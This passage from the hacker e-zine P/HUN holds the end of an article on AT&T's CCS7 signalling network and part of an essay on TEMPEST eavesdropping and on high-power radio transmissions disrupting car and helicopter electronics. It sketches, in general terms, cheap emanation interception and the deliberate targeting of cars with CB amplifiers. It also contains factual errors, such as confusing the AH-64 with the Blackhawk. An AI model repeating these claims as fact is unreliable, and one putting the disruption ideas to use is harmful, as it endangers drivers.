  3950. [more]       ronics Switching System machines.
  3951.  
  3952.                The Impact of AT&T Divestiture on CCIS Network
  3953.                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3954. On January 1, 1984 the court-ordered AT&T divestiture became effective.     
  3955. Divestiture establishment local access and transport areas (LATAs), which
  3956. defined local markets areas. AT&T became an inter-LATA carrier providing
  3957. communication services between these LATAs. Under the divestiture agreements,
  3958. the STPs,NCPs,and interconnecting data links were assigned to AT&T. The minor
  3959. use of these facilities by the divestiture BOCs(Bell Operating Companies) was
  3960. provided under contract.Equal access to the inter-LATA carriers under 
  3961. divestiture was provided mostly by MF/SF signalling. However a new multi-stage
  3962. MF outpulsing arrangement was added to forward the orginating number to inter-
  3963. LATA carrier for billing and other purposes.
  3964.  
  3965.                      Common Channel Signalling 7 (1985)
  3966.                      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3967. During 1985, the STP capability was enhanced by the introduction of 2STP based
  3968. on the AT&T 3B20 duplex (3B20D) processor and an associated processor inter-
  3969. connect capability (PIC).In addition , 56-kb/s digital facilities were provided
  3970. between the STPs. The 2STP uses the CCITT Signalling System 7 protocol and
  3971. [more]       provides message transfer part (MTP) function. The MTP can route a message
  3972. reliably and qucikly from one point in the signalling network to any other     
  3973. point. The resulting network has been named the CCS7 network. Initially, the   
  3974. CCS7 network was used to augment the trunk signalling capabilities of the 1STP
  3975. network using the embedded CCIS6 (ECIS6) protocol. ECIS6 interacts with CCS7
  3976. and allows switching systems connected to the 1STP network to communicate with
  3977. other switches connected to the 2STP network.However during this transitional
  3978. period, all switching systems are connected to either the 1STP or 2STP         
  3979. locations via 2.4 or 4.8 kb/s signalling links.
  3980.  
  3981.                        CCS7 Destination CCIS (1986)
  3982.                        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3983. In 1986 the CCS7 network was expanded to include direct signalling. This was 
  3984. done by adding new capabilities in the NCPs to allow 56-kb/s connecting links
  3985. and the ability to route direct-signalling messages within the 2STPs. For 
  3986. transitional compatibility, a new destination CCIS6 (DCIS6) interworking   
  3987. protocol was deployed. The 4ESS and 5ESS switches in the network will use the
  3988. Integrated Services Digital Network User Part (ISDN-UP) to control call setip  
  3989. and will have the capability to support ISDN services. The ISDN-UP will use the
  3990. services of the already deployed MTP and provide a broad set of switched   
  3991. digital services.
  3992. [more]       
  3993.            Evolution of NCP Serices to a Distibuted Architecture
  3994.            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3995. The increasingly demanding requirements of call processing services such as the
  3996. AT&T card service, advanced 800 and software defined network (ISDN) have led to
  3997. a steady evolution of the NCP architecture toward more distribution. This is to
  3998. increase versatility of the usage, flexibity of growth and performance. At the
  3999. same time we will be able to introduce more new services. The orgianl NCPs
  4000. introduced in 1980 consisted of AT&T 3B20 duplex processors and multiple disk
  4001. drives. The 3B20D handled all the fucntions including query processing database
  4002. admnistration and updates and signaling. The first step toward a distriuted
  4003. NCP architecture was in the signalling architecture. In 1985 the NCP  
  4004. incorporated a highly reliable processor interconnect capability(PIC) with the
  4005. same technology used in the 2STPs. It provides communication between the CCS
  4006. network and the NCP application databases in the 3B20D host Signalling links
  4007. from the STPs to an NCP terminate through link nodes(LNs) on the PIC.The CCS
  4008. query messages could access an NCP through the LNs and travel to the 
  4009. appropriate database application in the 3B20D. Similarly query responses     
  4010. destined to the CCS network could exit from the NCP through the PIC and the LNs
  4011. The future NCP architecture will continue to serve host to the NCP distributed
  4012. enviroment and the PIC will remain the vehical for the interprocess        
  4013. [more]       communication and signaling-link termination. To attain distributed query
  4014. processing, the NCP database architecture will feature the intergration of
  4015. multiple transaction-processing components.
  4016.  
  4017.                         CCS7 Network Interconnection
  4018.                         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  4019. With the potential for end to end signalling services and the adoption of CCS7
  4020. standards, there is a growing effort to connect networks of different carriers
  4021. and different countries as well as various privately owned networks. It is 
  4022. expected that in the future all North American networks will have CCS7.   
  4023. Therefore AT&T is  currently involved in defining standard CCS7 interface for
  4024. use between netwroks. Initially, the new interface will consist of 2STPs
  4025. deployed in pairs.This network configuration assumes that interconnecting will
  4026. use designated STPs as gateways. The gateway STPs will be required to screen
  4027. all incoming message to prevent unauthorized use of network resources and 
  4028. services :-)
  4029.  
  4030. Interconnecting networks using designated STPs as gateways.
  4031.  
  4032.  
  4033.                         Network
  4034. [more]                               boundary
  4035.  Network 1 (AT&T)          |     Network 2
  4036.  _____           ______    |   _______
  4037.  |\  |          |\   | |   |  |\   | | 
  4038.  | \ |----------| \  | |___|__| \  | | 
  4039.  |__\|          |__\_|_|   |  |__\_|_|\
  4040.    |  \            |       |      |    \
  4041.    |   \           |       |      |   SPC Switch
  4042.    |    \        __|___    |      |    /
  4043.    |     \______|\   | |   |   ___|___/
  4044.    |       _____| \  | |___|__|\   | | 
  4045.    |______|     |__\_|_|   |  | \  | | 
  4046.                 Gateway    |  |__\_|_| 
  4047.          2STP mated pair   |  Gateway STP 
  4048.                            |   mated pair   
  4049.                            |
  4050.  
  4051. The figure below shows interconnection of a small network that does not have
  4052. STP gateway.
  4053.                   Network
  4054.                   boundary
  4055. [more]       Small network 3      |     AT&T CCS7 netowrk
  4056.                      |  
  4057.                ______|_________%%%%
  4058.               /      |         %%%%
  4059.              /       |
  4060.   +++++++++ /        |
  4061.   +  SPC  +/         |
  4062.   +switch +\         |
  4063.   +++++++++ \        |
  4064.              \       |         2STP mated pair
  4065.               \______|_________%%%%
  4066.                      |         %%%%
  4067.                      
  4068. The same arrangement that is being used domestically is currenlty being inves-
  4069. tigated for application to the CCITT No. 7 message transfer part/telephone
  4070. user part (MTP/TUP) international network interconnection. However because of
  4071. differences between national networks, international interconnection is more
  4072. complex. With the implementation of ISDN-UP for international signalling in
  4073. early 1990s, it is expected that many of the existing domestic services will
  4074. be extended to embrace the international networks as well.
  4075.  
  4076. [more]                            CCS7 Support for ISDN Services
  4077.                      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4078. Common Channel Signalling was designed for signalling between network entities.
  4079. ISDN protocols are designed for out of band signalling all the way to the end
  4080. user.Much of the current effort in ISDN is in defining protocols and   
  4081. architectures for providing the out of band signalling from the end user 
  4082. premises to the network.However to provide end to end service the network has
  4083. to transport the end user's out of band signalling, using CCS or other means.
  4084. An important benifit of CCS7 is its inherent ability to support feature
  4085. transperancy i.e., allowing of passing of information that can only be       
  4086. interpreted and used by end users.This capability can be attained by 
  4087. interworking the ISDN Q.931 protocol with the CCS7 ISDN-UP and extending ISDN
  4088. to switched access users through network interconnection.          
  4089. Methods of supporting CCS7 features transparency include:
  4090.  
  4091. o Message-associated user to user information
  4092. o Temporary and permanent signalling connections.Message associated user to
  4093.   user information could pass along with regualar CCS7 call control messages
  4094.   as opposed to using signaling connections specifically established for that 
  4095.   purpose. The transfer of transparent inoformation would generally be done
  4096.   after the signalling connection (temporary or permanant) is established but
  4097. [more]         message associted transparent information could be transfered during the
  4098.   establishment and/or termination phases of the signaling connection.
  4099.  
  4100. Both AT&T and the regional BOCs are deploying ISDN signalling in their networks
  4101. Once in place, ISDN offers capabilities such as
  4102.  
  4103. o Per-cali selsction of services and bandwidth
  4104. o Combined voice,data and even video on a single call
  4105. o Calling-number identification at the terminating end (for example, a digital
  4106.   display for the calling number during ringing)
  4107. o Sophisticated multimedia teleconferencing capabilities
  4108.  
  4109. Futhermore ISDN will be able to make it possible to add new features and 
  4110. improve the implementation of the exsisting services such as support packet  
  4111. transmission and separation of the call/control from user control information
  4112. in ISDN.
  4113.  
  4114.                    Potential CCS7 Network Enhancements
  4115.                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4116. The future CCS network will probably be configured as follows:
  4117.  
  4118. [more]       1) The ISDN-UP will be used throughout North America.As local carriers adopt
  4119.    CCS7 network interconnect will provide for end to end digital services. The 
  4120.    signalling connection control part (SCCP) will be used to provide data 
  4121.    capability for ISDN user to user information.
  4122. 2) The CCITT No. 7 protocol will be used internationally.First the telephone
  4123.    user part (TUP) will provide basic call setup to countries that chose to use
  4124.    this protocol initially. However because of its increased flexibility and
  4125.    support for digital services, the ISDN-UP will be used to extend domestic
  4126.    ISDN services worldwide. 
  4127. 3) The interconnection with local exchnage carriers as they expand their own
  4128.    CCS systems will enhance LATA access services and allow new inter-LATA 
  4129.    service.
  4130. 4) AT&T services will evolve as the flexibility and capacity of the CCS7 of the
  4131.    protocol is utilized.The transaction capability and part (TCAP) will provide
  4132.    an effecient protocol for direct-signalling query and responses, to support
  4133.    new databases and switch-based services. 
  4134.    The interworking of CCS7 with the Q.931 ISDN access protocol will allow end
  4135.    to end services that are not possible with in-band signalling and will
  4136.    provide more effective and innovative use of work.
  4137.  
  4138.                                   Conclusion
  4139. [more]                                         ~~~~~~~~~~
  4140. The evolution os the AT&T common channel signalling system has been shown to be
  4141. a critical part of the AT&T network and services. It has provided a cost 
  4142. effective means of providing flexibility in the marketplace. The system
  4143. is expected to evolve as new capabilities and need are indentified.
  4144.  
  4145. Tubular Phreak NUA!
  4146.  
  4147.  
  4148. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4149. =                   P/HUN Issue #3, Volume 2: Phile #8 of 11                  =
  4150. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4151.  
  4152.                              WHO'S LISTENING 
  4153.                              ---------------
  4154.                               By  Capt. Zap
  4155.  
  4156.  
  4157. Over the years, there has been a number of different studies and 
  4158. discoveries that would alter personal and electronic security over 
  4159. time. Devices able to "listen" to almost any form of communications 
  4160. [more]       have become commonplace and are available "over the counter" from a 
  4161. varied number of sources. Such units range from ten to fifteen dollars 
  4162. to expensive set-ups that employ microwaves and lasers for the 
  4163. interception of almost any audio signal in the spectrum. But now with 
  4164. somewhat needed protection from outsiders in reference to this 
  4165. problem, a number of solutions have been put in place and global 
  4166. protection is insured in environments that have such need. But the 
  4167. coverage of environment has had a a major change in protective attention 
  4168. now being place on the actual electronic emmanations that are so common 
  4169. with todays standard electronic apparatus. Electronic telephones, 
  4170. computers and communications networks, ATM's, radio and television 
  4171. stations are just part of the overall electronic bubble that we have 
  4172. placed our society into with the hopes of providing better and faster 
  4173. methods to make daily life a bit easier. But with such a fragile structure 
  4174. as the electronic bubble, we have new opportunities to discover secrets 
  4175. never before possible due to the lack of technology. The same technology 
  4176. that helps us in one way or another may also be helping others 
  4177. unbeknownist to those who are protecting the environment in the first 
  4178. place. Signal leakage, either by design or by accident may lead to total 
  4179. collapse of protective measures due to "wide open spaces" in the 
  4180. protective sphere. In this particular paper, we will discuss the possible 
  4181. [more]       problems of common office technology may bring in un-securing your 
  4182. installation. 
  4183.  
  4184.  Our main focus will be in the areas concerning with the emmanations 
  4185. or transmissions of "Tempest" frequencies. "Tempest", is the code name 
  4186. given to a specfic area concerned with radio frequencies radiated by 
  4187. computing equipment by the U.S. Dept. of Defense. This "concern" from 
  4188. such equipment dates back to the late 50's. The concern ranged from the 
  4189. possible interception of "informational information" by sources other 
  4190. than the intended users of such. The problem is more easily reconigized 
  4191. by the current requirement of normal electronic equipment having to 
  4192. conform to emmision standards put forth by the Federal Communications 
  4193. Commission in reference to the amount of electronic "noise" generated 
  4194. by common standard technology so that such signals do not interfer 
  4195. with other such pieces of equipment or their operations. 
  4196.  
  4197. To describe in simple terms, Tempest frequencies are almost straight 
  4198. through from commerical AM stations to the upper reaches of 600 Mhz. 
  4199. They are generated or transmitted by any number of different common 
  4200. daily life electrical and electronic systems. Your TV puts out one 
  4201. frequency, the stereo another, the common electronic telephone, 
  4202. [more]       cordless phones still another, the microwave oven puts out another and 
  4203. the wireless alarm does it to, and story goes on. So just as all of these 
  4204. pieces of equipment emmit a signal, so does the personal computer.  
  4205.  
  4206.  
  4207.  
  4208. We will describe two possible examples of such informational information 
  4209. and the abilty for some with directed intent to cause potentially fatal 
  4210. results due to the use of directed "noise". It should be noted that 
  4211. the current specifications for "Tempest" approved systems is considered 
  4212. classified by the DOD and these specs were not available to the author. 
  4213. But if one was to look at the specs for normal computing equipment 
  4214. and reduce the allowed emmission output by at least 50 percent, that 
  4215. may be a realistic emmission standard accepted by the DOD.  
  4216.  
  4217.  
  4218. Example 1 
  4219.  
  4220. "We had better "Czech" this out!
  4221.  -------------------------------
  4222. In 1987, a very strange occurence concerning forgein nationals from 
  4223. [more]       an Eastern bloc nation entered this country in a large camper-like 
  4224. truck via the border checkpoint at Niagra Falls, New York. 
  4225. The visitors numbering 4 or 5, were in the country under tourist visa's 
  4226. and were reported to be representives of the countries automobile and 
  4227. truck industries here on a promotional tour to garnner interest in their 
  4228. exportable products. The one problem with the "visitors" is that none of 
  4229. them had any connection with such industries in their home country. 
  4230. In fact, the visitors were far from what they supposedly represented. 
  4231. The group descripton read like a Whos' Who of mid-level management of 
  4232. Eastern bloc intelligence operations. The group reportedly consisted of 
  4233. a nuclear physists, a specialist in aerial map-making complete with a 
  4234. small ultra-light powered aircraft, a communications and computer expert 
  4235. and two communist party officals. 
  4236.  
  4237. Over a 5 month period, the group was reported to have visited 17 states 
  4238. looking at 40 to 48 sites dealing with military and defense contractor 
  4239. sites. The vehicle and its occupants were reportedly followed by over 
  4240. 100 agents of the FBI, NSA, Secret Service and State department and at 
  4241. least one over flight of a military reservation was reported. Even though 
  4242. the overflown site was not identified, one site was. This site, was the 
  4243. "sensitive" naval communications center for the Pacific Fleet located 
  4244. [more]       in San Diego. It was reported that the truck and it's occupants were 
  4245. parked a few hundred yards from the facility for several days and 
  4246. according to law, were in no violation of any current statute at the 
  4247. time. The group was also at or around at the 2800 acre North Island 
  4248. Naval Air Station based in Coronado, California. The spokesman for the 
  4249. base stated that you could not see much of anything going on except for 
  4250. the take-off and landing of aircraft which you could see from almost 
  4251. any place. 
  4252.  
  4253. Common sense states that you do not have to be inside the facility in 
  4254. either a physical or electronic standpoint to collect information. You 
  4255. can park in any lot or street close enough to your supposed target and 
  4256. stick up your antennas. No property violations, no photo restrictions to 
  4257. comply with, no restrictions at all because you are sitting in a public 
  4258. place, parked or having coffee with your "ears" on. A good example of 
  4259. such parking was reported in a paper published in Computers and 
  4260. Security 4, titled Electromagnetic Radiation from Video Display Units: 
  4261. An Eavesdropping Risk? by William Van Eck, copyright 1985. He stated 
  4262. that when they were conducting their experiments in the open on public 
  4263. roadways, with a van and antenna system that was quite noticable, 
  4264. no one asked what they were doing or had any thought about the time 
  4265. [more]       spent doing such things. 
  4266.  
  4267. The end of this particular story is as follows: At the end of the suspect 
  4268. journey, the truck was searched at the Nosgales, AZ border checkpoint and 
  4269. was then released. Nothing considered illegal was found in the search 
  4270. and the truck and it's passengers were released and entered Mexico. 
  4271. Now even though the truck was suspected of performing passive 
  4272. "eavesdropping" operations, the federal goverment had no legal right to 
  4273. hold either the truck or crew. And the possible intercepted information was 
  4274. then released from the country. It should be noted that the truck could  
  4275. have a number of standard "off the shelf" items. These items could 
  4276. have consisted of 2 general coverage radios with a combined tuning range 
  4277. between 100 Khz to 2 Ghz., an IBM personal computer clone, various 
  4278. cheap video and signal enhancment equipment, printers and modems, 
  4279. and other such complement devices. 
  4280.  
  4281. None of the equipment would be any "James Bond" type of gear and the 
  4282. basic suspected set-up would cost the operation less than 10,000 dollars 
  4283. if budgeted correctly. And if possible, use of other simple off the shelf 
  4284. type radios like the 200.00unit available from Radio Shack that covers 
  4285. 150 Khz to 30 Mhz is not at all unheard of due to some budget constraints. 
  4286. [more]       And since most emmanated signals generated by logical devices are within 
  4287. commerical AM and FM frequencies, the use of a standard auto radio antenna 
  4288. would suffice to use as a pickup. 
  4289.  
  4290. So the major concern with such actions comes from the ability of simple 
  4291. equipment to detect, register and decipher such emmanations with relative 
  4292. ease. The ability of such persons and possible actions able to penitrate 
  4293. the electronic fog of our society should be a clear distinct warning to 
  4294. those concerned with security in general. 
  4295.  
  4296. In addition to all of the above, the author contacted various federal 
  4297. goverment agencies in reference to this information and was told that 
  4298. they had no knowledge of such an investigation and could not tell where 
  4299. such supposed counter-intelligence operations were controlled from or who 
  4300. to contact in reference to supplying such information. Current "Freedom 
  4301. of Information Act" requests for information concerning this supposed 
  4302. federal project are underway.
  4303.  
  4304. An interesting note about filing the forms for access to information 
  4305. about the Czech incident is described to give guidance to others who 
  4306. may wish to investigate this incident and seek help from such elected 
  4307. [more]       officals. 
  4308.  
  4309. When the papers were filed for the desemenation of information 
  4310. through the Freedom of Information Act, members of the U.S. Senate and 
  4311. Congress were contacted in reference to this matter. The first contact
  4312. was placed through Senator Arlen Spectors office in Philadelphia, Pa.
  4313. We were first rebuffed by persons who refused to identify themselves 
  4314. with the statement " I am sorry, but that information is covered by 
  4315. the 1974 Privacy Act, Click! Well we called back and informed the 
  4316. person who answered the call of the situation and then were re-connected 
  4317. and informed them that Czech citizens were not covered by US privacy 
  4318. laws and that there was no invasion of privacy. 
  4319.  
  4320. They called the FBI and asked if they were the way such things were 
  4321. handled, and were told yes or no. But they had no answer for any question 
  4322. put forward and said " They were sorry!", but we don't know how to help 
  4323. you!. Our second contact to Senator Spectors office in Philadelphia as 
  4324. in essance like the first, they would not assist nor would explain why 
  4325. they took this position in the first pace. During our second contact 
  4326. we spoke to a Miss or Mrs. Anderson. She stated that such requests 
  4327. were not in the senator's perview and they could not assist in this 
  4328. [more]       matter. When asked why it as not in the senators preview, we were 
  4329. informed that they do not have to give a response. When asked for an 
  4330. offical response, we were informed that no offical response would be 
  4331. given. But as a side note, Senator Hienz office said that they would 
  4332. forward the requests to Spectors office in Washington. One other 
  4333. thought on this matter: I am sure that if the good senator wants to get 
  4334. some information, his staff jumps through hoops to get him all he wants 
  4335. and then some! A pre-publish copy of this article will be delivered so 
  4336. that even he (or his office staff, who were of no help at all due to a 
  4337. tough question placed to them by a citizen) may learn of what may be 
  4338. going on in his own country. So much for gaining assitance from a senator 
  4339. who sits on a judical panel. We visited next the office of John Hienz. 
  4340.  
  4341. Again, funny looks about the Freedom of Information Act and they hemmed 
  4342. and hawed at the questions presented. They took the requests and said they 
  4343. would try and see what could be done. Our final visit was to our local 
  4344. congressman, Tom Foglietta, whos office still stated the 1974 Privacy law, 
  4345. but took the requests when presented in person. It pays to visit your 
  4346. elected representives working areas. So much to do (if you work there!) 
  4347. in a goverment office. Other federal agencies including the FBI were most 
  4348. helpful in complying with the requests. Of course we found this most 
  4349. [more]       interesting. Is it so they could possibly reclassify the information to 
  4350. a "Secret" status instead of what it may be now. 
  4351.  
  4352. Other agencies contacted in reference to FOIA requests include the CIA, 
  4353. NSA, NRO, Customs, State Dept., Army Automated Intelligence and Military 
  4354. Police, FBI, FCC .
  4355.  
  4356.  
  4357. Example 2
  4358.  
  4359. "Breaker, Breaker, Wally Gator!"
  4360.  -----------------------------
  4361. During the 70's, the United States had a short term love affair with 
  4362. the Citizens Band radio. What were once clean channels were suddenly 
  4363. crammed with persons who wanted to be able to communicate with any 
  4364. number of persons who also had such capabilities. Suddenly, everyone 
  4365. had one of these radios in the home or car and some were know to have 
  4366. both. Numerous persons ran such rigs with varing illegal applications 
  4367. ranging from a lack of license to the intense over powering of such 
  4368. stations. 
  4369.  
  4370. [more]       To give a brief explanation of CB's, we will keep it simple. CB's 
  4371. transmit in the upper reaches of 26 Mhz to 27 Mhz or 11 meters band. 
  4372. CB's are allowed to operate with a maximum output of 5 watts radiated 
  4373. power. Of course this limited power was not sufficent for some users and 
  4374. the use of linear amplifiers or "heat" was commonplace. Stations were 
  4375. known to be transmitting 50 to 2 thousand watts to their antennas which 
  4376. in turn would increase such signals to a power of over 2 hundred thousand 
  4377. watts. Some operators were known to show the intense power outputs with 
  4378. the use of flourescent lightbulbs and the abilty to "light" these tubes 
  4379. from a distance without electrical connections with the amplified radiated 
  4380. power of their antennas.   
  4381.  
  4382. Some persons were known to have full control of channels in their 
  4383. respective areas and would blank out anyone who would not conform to  
  4384. the channels establised rules or procedures. Others set-up pirate 
  4385. stations that would broadcast commerical music for all to hear 
  4386. complete with news, weather and sports. Such actions would tie up 
  4387. frequencies and caused a general crackdown by the FCC in the later 
  4388. years. But the problem still continues and the FCC has all but given 
  4389. up on the idea of any enforcement of regulations concerning such 
  4390. operations on the 11 meter or 27 Mhz band.
  4391. [more]        
  4392. The craze of CB's left the general populace by the late 70's and was 
  4393. back in the hands of those who would truely use such radios. Those who 
  4394. would use such radios best known, would be the persons called truckers 
  4395. since that is what they do. They "truck" goods from one place to 
  4396. another and are concerned with time and travel conditions as most of 
  4397. us are. The truckers always had some "heat" on-board for those times 
  4398. when they could not get their signal "out". It was and still is 
  4399. considered an insurance policy by most who have this technology and is 
  4400. widespread in its use. 
  4401.  
  4402. Now over time, with the continued expansion of these radios, the 
  4403. truckers began to switch to marine band radios in the 10 meter band 
  4404. and were conversing just as before. Since the 10 meter band would 
  4405. permit such radios and the increased power output, the switch to 10 
  4406. meters was only a matter of time. Now, it is reported that most 
  4407. truckers are using and abusing such frequencies and their is little 
  4408. that can be done to stop such occurances from happening. To add to all 
  4409. of the mess, such radios have the ability to switch operating frequencies 
  4410. with the touch of a button. In brief, the 10 meter radios can switch to 
  4411. the 11 meter (CB) band with minor modifcations. And back and forth 
  4412. [more]       frequency hopping is as easy as tuning in the average auto radio. 
  4413.  
  4414. One other interesting aspect of these 10 and 11 meter radios and their 
  4415. use of 10 meter amplifiers, is the problem of interference generated 
  4416. by the amplifiers due to the lack RF chokes and filters for the simple 
  4417. reason that the unit is designed for use on the 10, meter band, not 
  4418. the 11 meter band and thats what the chokes and filters look for, 10
  4419. meters, nothing more, nothing less! 
  4420.  
  4421. Enter the common travelling person with a late model vehicle. Most 
  4422. vehicles today have some form of directed artifical intelliengence 
  4423. working under the hood. The "brain" controls any number of common 
  4424. operations ranging from air / fuel mixtures to how and when braking 
  4425. systems will perform. Microprocessors in todays cars are as common as 
  4426. seatbelts and are now required to assist in normal operations of said 
  4427. vehicles. And this is where the problem begins. Since the auto must 
  4428. have such control circuitry to function, then the possible interference 
  4429. of such operations becomes a real threat. But what sort of threat 
  4430. could be possible with a car, its control systems and a high powered 
  4431. transmitting radio? Well, if one was to examine the idea of overriding 
  4432. or shuting down said operations, the car would cease to function in any 
  4433. [more]       proper manner. Such a shutdown could very easily cause fatal accidents 
  4434. and the cause would be un-known due to all "looking" fine in any 
  4435. aftermath examination. 
  4436.  
  4437.  Now we add to the scene, your common average trucker with such a radio 
  4438. in his poccession and the ability to transmit high powered signals as 
  4439. one chosses. One example of such high power hijinks would be the 
  4440. specfic targeting of autos on the highway with a points / scoring 
  4441. system based on performance, price, make and if the car was built in 
  4442. the U.S. or not. What would be the outcome? To answer, it would be the 
  4443. shutdown of of the cars electronic logical systems causing other systems 
  4444. on-board to do likewise in successive order. How can this come about? 
  4445. Well the answer is quite clear, the high powered signal causes the logical 
  4446. centers to conflict or ignore basic operational commands from the 
  4447. microprocessor in turn causing the microprocessor to close down, then 
  4448. cause a halt to basic actions and the car stops running. 
  4449.  
  4450. Other known occuring incidents that have had some humerous and fatal 
  4451. results have been reported in the past years by the press. Examples 
  4452. are:  
  4453.  
  4454. [more]       1. As early as the mid-seventies, Volkswagen developed a computer 
  4455. controlled fuel injection valve control system. The car worked perfectly 
  4456. in Europe, but had some unexplained engine failures in the united 
  4457. states. The problem of engine failure was intermintent and very short 
  4458. lived when happening. The alleged cause of such failures were the 
  4459. transmission of Citizens Band radio frequencies from either mobile or 
  4460. base stations near by and causing an induced current sufficent to 
  4461. cause a malfuncition. 
  4462.  
  4463. 2. It was reported that some GM cars were having problems with the use 
  4464. of two meter radios and the electronic control systems. Other cars are 
  4465. reported to have some problems with cellular phones. Reports from 
  4466. England even indicate such problems occuring in a wide spectrum of 
  4467. autos in the area around Daventry due to RFI from the transmitter used 
  4468. by Radio Four, a commerical station transmitting on 1500 meters along 
  4469. with local AM and FM broadcasts. It seems that the station base was using 
  4470. a very high wattage transmitter and that when the transmitter was 
  4471. transmitting, the cars that passed close to the station would sometimes 
  4472. shutdown the engine causing minor overall problems and some angry 
  4473. motorists. If you look at this problem, you may see possible small 
  4474. scale urban electronic warfare possibilities. Two such areas might 
  4475. [more]       include the use of directed radio energy against late model autos by 
  4476. law enforcement or worse, by terroristic factions seeking to do the 
  4477. same thing. And one more example of such reports concern the sudden 
  4478. acceleration problems with some imported cars in the U.S. An interesting 
  4479. point to mention is that HONDA is offering owners of the 1988 Civic a 
  4480. replacement chip because of such reported problems. 
  4481.  
  4482. 3. On the lighter side of the problem, it was reported in the November 
  4483. 24th, 1987 edition of the Baltimore Sun, that some residents of 
  4484. Frederick, MD were having problems with the use of their electronic 
  4485. garage door openers. Owners of such devices returned them to places 
  4486. of purchase and found that the units worked perfectly. It was noted 
  4487. that nearby, the U.S. Army operates a major communications center for 
  4488. both domestic and international traffic. An Army spokesman stated that 
  4489. they are not radiating anything that should lock up the garage door 
  4490. recievers. It is also reported that when the Army turned off certain 
  4491. transmitters, the garage door openers would work again. While the Army 
  4492. stated that they were not the problem, the "problem" did disappear as 
  4493. stated by the Army. You be the judge on this! 
  4494.  
  4495. On the fatal side of this problem, incidents were more deadly than funny. 
  4496. [more]       Although the cause of such incidents was all not due to an "Alligator" 
  4497. radio, but it was caused by the same type of over poowered raidiated radio 
  4498. emmissions. The cause was high wattage again and was to effect a new type 
  4499. of attack helicopter in use by 2 different U.S. armed services. 
  4500. The helicopter, known as the AH-64, Blackhawk or the naval version named 
  4501. Seahawk is considered, operational state of the art in low level air 
  4502. combat situations and is highly electronic in its basic make-up and 
  4503. operations. The problem was two fold in nature and both were to contribute 
  4504. in the final discovery. 
  4505.  
  4506. The first cause was due to the need of the design to employ a unique 
  4507. horizontal stabilizer to help the helicopter improve it fly-ability. 
  4508. The stabilizer was controlled through a series of electronically 
  4509. activated hydraulic systems run through a microprocessor that in turn was 
  4510. controlled from the cockpit through a series of other logical and 
  4511. electronic relay systems. There was no physical connection between the 
  4512. crafts flight controls and the pilot of the craft. What is meant, is that 
  4513. the fly by wire method was replaced by a set of relays and hydralic 
  4514. attenuators instead of cables and pulleys. It may not a been as smooth as 
  4515. the electronic flight, but it took an explosive charge to bring the 
  4516. control to a dead stick and at the same time could be fixed with a pair 
  4517. [more]       of wire cutters and clamps instead of a soldering iron and electronic 
  4518. parts.  
  4519.  
  4520. The second problem, being more unknown and deadly, consisted of radio 
  4521. frequency interferance stemming from a number of different sources. 
  4522. One such source was found as a common citizens band radio with major 
  4523. illegal power output. Another incident of the same type of nature was 
  4524. discovered when one of the helicopters flew to close to a commerical 
  4525. radio stations transmissions towers. Both times the flight ended in 
  4526. fatalities for the crews. It was discovered that strong radio was the 
  4527. cause. According to published reports, 5 UH-60 Blackhawks have 
  4528. nosedived into the ground killing 22 serviceman since 1982. And the 
  4529. U.S. Army instructed it's pilots that flights near microwave antennas 
  4530. or shipboard radar may cause "uncommanded" altitude changes. In English, 
  4531. it translates to crashing into the ground at 600 miles per hour! 
  4532. So, this basic simple problem was not thought of as one that was possible 
  4533. even with the current concerns of systems management in the now fully 
  4534. electronicisied battlefield. 
  4535.  
  4536. So, the first problem was that the controls of the craft are being 
  4537. directed by impulses instead of physical controls. The second was the 
  4538. [more]       use of un-protected electronics from both background and now, potential 
  4539. directed uses of radio frequency energy as weapons of warfare or even 
  4540. better, as stated before limited urban actions.  
  4541.  
  4542. So now we take the approach of normal radio environment and place an 
  4543. active thought to possible options no available to a direct force. 
  4544. If reports of these natures are known to the general public, then what 
  4545. is to stop the directed force from becomming a new invisible tactic 
  4546. that can cause major disruptions of computer / communications systems 
  4547. currently in use. 
  4548.  
  4549. Lets take the current state of electronic protective measure in force 
  4550. and used by the different defense agencies throughout the country. 
  4551. First off, we have the problem of large Electro-Magnetic Pulses, (EMP's) 
  4552. being able to disrupt command and communications links with the use of 
  4553. one nuclear device detoneated at a unknown range above the continential 
  4554. united states. 
  4555.  
  4556. Another example comes from outside theoretical research concerning the 
  4557. SDI programs. One thought, from Thedore B. Taylor, a retired nuclear 
  4558. weapons designer and father of the largest yield fission bomb, the 
  4559. [more]       S.O.B., was quoted in an interview published in September, 1987. 
  4560. He stated that if you explode a one-kiloton device in space and directed 
  4561. the energy into a 3 centimeter beam of radiation, you could deposit 
  4562. enough energy to wipe out electronic and electrical equipment - computers, 
  4563. antennas, power lines, over an area larger that Washington, D.C. He was 
  4564. also quoted as saying that microwave weapons are more than likely being 
  4565. developed too. 
  4566.  
  4567. Now weapons of this nature are on a very large scale and require vast 
  4568. amounts of energy too start with. But in a directed small beam aimed at 
  4569. normal general construction type buildings, a directed beam of energy cuts 
  4570. through walls, doors, and windows as if they were not even there. 
  4571. Your example is some of the local television or radio stations in your 
  4572. area. If you look at all or most of the stations, you might find a small 
  4573. shack atop of their building. It may contain the microwave dishes for the 
  4574. studio to transmitter links. The glass and wood are nothing to the 
  4575. in-comming or out-going signals. Brick walls mean nothing to a radio 
  4576. signal either. Just tune in your desk radio and listen to your 
  4577. favorite station. 
  4578.  
  4579. So this pulse would be able to short out almost all commerical electrical, 
  4580. [more]       telecommunications, computer operations, and any other devices that 
  4581. contain transistors or semiconductors for a circuit path. These basic 
  4582. examples show what such types damage that these emmisionns may pose. 
  4583.  
  4584. The second part of this problem is with the protection of such circutry. 
  4585. Great amounts of technology protection comes in the form of deep trenches,
  4586. standard and special grounding of buildings and equipment, cable and 
  4587. support runways, and concrete encasements. Now this is all wonderful and 
  4588. good from a military viewpoint where money is no object, but in the real 
  4589. world, the use of such protective measures is not possible even for the 
  4590. most prestigieous of corporations. 
